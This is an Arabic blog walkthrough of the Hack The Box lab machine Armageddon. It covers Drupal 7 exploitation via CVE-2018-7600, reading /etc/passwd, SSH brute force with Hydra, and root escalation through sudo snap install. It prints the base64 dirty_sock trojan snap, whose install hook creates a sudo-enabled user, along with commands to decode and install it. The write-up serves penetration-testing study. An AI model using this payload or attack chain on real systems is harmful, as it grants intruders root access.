القائمة الرئيسية

الصفحات

سلسلة Hack the box - خطوات اختراق جهاز Armageddon

سلسلة Hack the box - خطوات اختراق جهاز Armageddon

 سلسلة Hack the box - خطوات اختراق جهاز Armageddon


المهارات اللازمة لهذا الصندوق:

  • القليل من المعرفة بلغة بايثون

طور المستخدم

كالعادة بدأت بفحص Nmap

Nmap Scan
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA) | 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA) |_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) |http-favicon: Unknown favicon MD5: 1487A9908F898326EBABFFFD2407920D |_http-generator: Drupal 7 (http://drupal.org) | http-methods: | Supported Methods: GET HEAD POST OPTIONS | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16 |_http-title: Welcome to Armageddon | Armageddon


رأيت أن هناك دروبال 7 موجود على الجهاز ، لذلك وضعت ذلك في الاعتبار. بعد ذلك قفزت إلى المنفذ 80 ، لنشاهد ما يحدث هناك.

طور المستخدم



لقد جربت كلمات المرور الافتراضية ، وأنشأت حسابًا ولكني لم أحقق نجاحًا. لذا توجهت إلى جوجل وبحثت عن استغلال دروبال 7 وأجاب جوجل بهذا الرابط:

 CVE-2018-7600.


باستخدام برنامج الاستغلال، تمكنت من الحصول على PHP-Fake shell ، ليس الأفضل ولكن لا بأس به. بدأت أولاً في إنشاء ملفات PHP ، وحاولت الحصول على اتصال عكسي ولكن يبدو أن الاتصالات الصادرة محظورة للمستخدم الحالي. كان أملي الأخير هو اجراء brute force على خدمة ssh. لذلك طلبت من الشل أن يظهر لي محتويات ملف /etc/passwd وحصلت عليه! 


باستخدام اسم المستخدم وعنوان الايبي ، كان لدي كل ما أحتاجه لزيارة برنامج هيدرا ، صديقي القديم. لم يخيب ظني هيدرا ، ويمكنني تسجيل الدخول باستخدام بيانات الدخول الحالية.

احصل على علم المستخدم الذي تستحقه!


والان احصل على علم المستخدم الذي تستحقه!


طور الروت

بعد الاحتفال بالنجاح ، قمت بتشغيل sudo -l ورأيت أن المستخدم bruce يمكنه تشغيل الامر sudo /usr/bin/snap install  بدون كلمة مرور. رائع!


كان الشيء الصعب هو معرفة المكان الذي يمكنني الحصول فيه على ملف snap وجعله يعمل. لا تنس أبدًا ، إذا لم تكن جوجل تعرف ذلك ، فقد أخطأت في تقدير جوجل. بعد ساعة أو دقائق جئت إلى هذا الرابط. بالطبع لم أقرأ التعليقات ، وهو ما كان يجب أن أفعله.

# The following global is a base64 encoded string representing an installable
# snap package. The snap itself is empty and has no functionality. It does,
# however, have a bash-script in the install hook that will create a new user.
# For full details, read the blog linked on the github page above.
TROJAN_SNAP = ('''
 aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD/
 /////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJh
 ZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5
 TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERo
 T2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawpl
 Y2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFt
 ZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZv
 ciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5n
 L2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZt
 b2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAe
 rFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUj
 rkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAA
 AAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2
 XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5
 RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAA
 AFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw'''
                + 'A' * 4256 + '==')


بطريقة ما تمكنت من قراءة التعليق بسهولة. ما عليك سوى القيام ببعض مهام python وفك تشفيرها من خلال base64 إلى ملف من اختيارك.

python -c "print(TROJAN_SNAP)" | base64 -d > file_of_your_choice.snap

حدث كل سحر بايثون على النظام المضيف ، قط فقم بنقل الملف إلى النظام المستهدف وقم بتشغيله.


sudo /usr/bin/snap install --devmode file_of_your_choice.snap


ينشئ ملف snap المحدد هذا مستخدمًا جديدًا dirty_sock:dirty_sock. قم بالتبديل إلى هذا المستخدم وقم بتشغيل الامر sudo -s.

طور الروت


احصل على علم الجذر الذي تستحقه.


reaction:

تعليقات